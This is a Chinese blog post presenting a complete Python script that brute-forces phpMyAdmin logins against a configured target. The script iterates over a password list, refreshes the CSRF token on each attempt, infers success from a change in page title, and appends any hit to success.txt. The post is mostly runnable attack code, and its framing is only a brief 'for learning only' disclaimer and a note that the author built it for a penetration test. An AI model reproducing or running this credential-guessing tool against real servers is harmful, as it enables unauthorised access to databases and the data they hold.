前言

使用效果

本脚本仅作学习交流使用,请勿用于非法用途

最近在做渗透测试,有一台内网的PhpMyAdmin的机器,想着爆破一下,网上找的脚本或多或少都有点问题,就自己造了一个。

脚本

只支持Python3.4及以上版本

修改 target、user、passdic 三个参数，然后直接运行即可；如果爆破成功，会把结果追加写到 success.txt 文件里。

#!/usr/bin/python3
'''
# @Author       : Chr_
# @Date         : 2020-12-06 12:39:57
# @LastEditors  : Chr_
# @LastEditTime : 2020-12-08 13:16:20
# @Description  : PhpMyAdmin爆破脚本
'''
#
from requests import session
from re import findall
from html import unescape
#
# PMA address, e.g. http://localhost/index.php (every try_login POST goes here)
target = 'http://localhost/index.php'
# username to test
user = 'root'
# path of the password list, one candidate per line (read by fuck_pma)
passdic = 'password.txt'
#
# One requests.Session shared by every try_login call, so cookies the server
# sets are carried across POSTs. Assigning ss.headers *replaces* the
# session's default header dict (including requests' own User-Agent)
# rather than merging into it.
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
    '''Extract the hidden "token" form value from an HTML page.

    Returns the HTML-unescaped value of the first
    ``name="token" value="..." />`` occurrence in ``text``; returns None
    when the page contains no such field (despite the ``str`` annotation).
    '''
    pattern = 'name="token" value="(.*?)" />'
    matches = findall(pattern, text)
    if not matches:
        return None
    return unescape(matches[0])
def get_title(text) -> str:
    '''Return the text inside the first <title>...</title> of ``text``, or None.

    The capture is greedy and does not cross newlines, so if several
    <title> tags share one line the result runs from the first opening
    tag to the last closing tag on that line.
    '''
    for captured in findall('<title>(.*)</title>', text):
        return captured
    return None
def try_login(user, pwd, token):
    '''POST one login attempt to the module-level ``target`` via ``ss``.

    Sends the phpMyAdmin login form fields (pma_username, pma_password,
    server, target, token) and returns the response body as text; the
    caller decides from that body whether the attempt succeeded.
    Every call is exactly one HTTP POST.
    '''
    form = dict(
        pma_username=user,
        pma_password=pwd,
        server=1,
        target='index.php',
        token=token,
    )
    response = ss.post(url=target, data=form)
    return response.text
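def fuck_pma():
    '''Try every password in ``passdic`` for ``user`` against ``target``.

    A baseline request with empty credentials yields the failure-page
    title and the first form token; each later attempt re-reads the token
    from the previous response. Success is inferred solely from the page
    title differing from the baseline title, so any other page (error,
    lockout, redirect) is also reported as a success. The first hit is
    appended to success.txt and the loop stops. One POST per candidate
    plus the baseline. Uses f-strings, so Python 3.6+ is required.
    '''
    with open(passdic, 'r', encoding='utf-8') as f:
        html = try_login('', '', '')
        title_fail = get_title(html)
        token = get_token(html)
        for line in f:
            pwd = line.strip()
            print(f'[?] 尝试登陆  {user}  {pwd}  ')
            html = try_login(user, pwd, token)
            title = get_title(html)
            token = get_token(html)
            if title != title_fail:
                print(f'[√] 登陆成功  {title}')
                # Separate name for the output file: rebinding `f` here would
                # shadow the password-list handle opened above.
                with open('success.txt', 'a', encoding='utf-8') as out:
                    out.write(f'{target}  |  {user}  |  {pwd}\n')
                break
            else:
                print(f'[×] 登陆失败  {title}')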
if __name__ == "__main__":
    # Top-level boundary: any exception is printed to stdout and the
    # process still exits with status 0.
    try:
        fuck_pma()
    except Exception as exc:
        print(exc)
最后修改:2020 年 12 月 08 日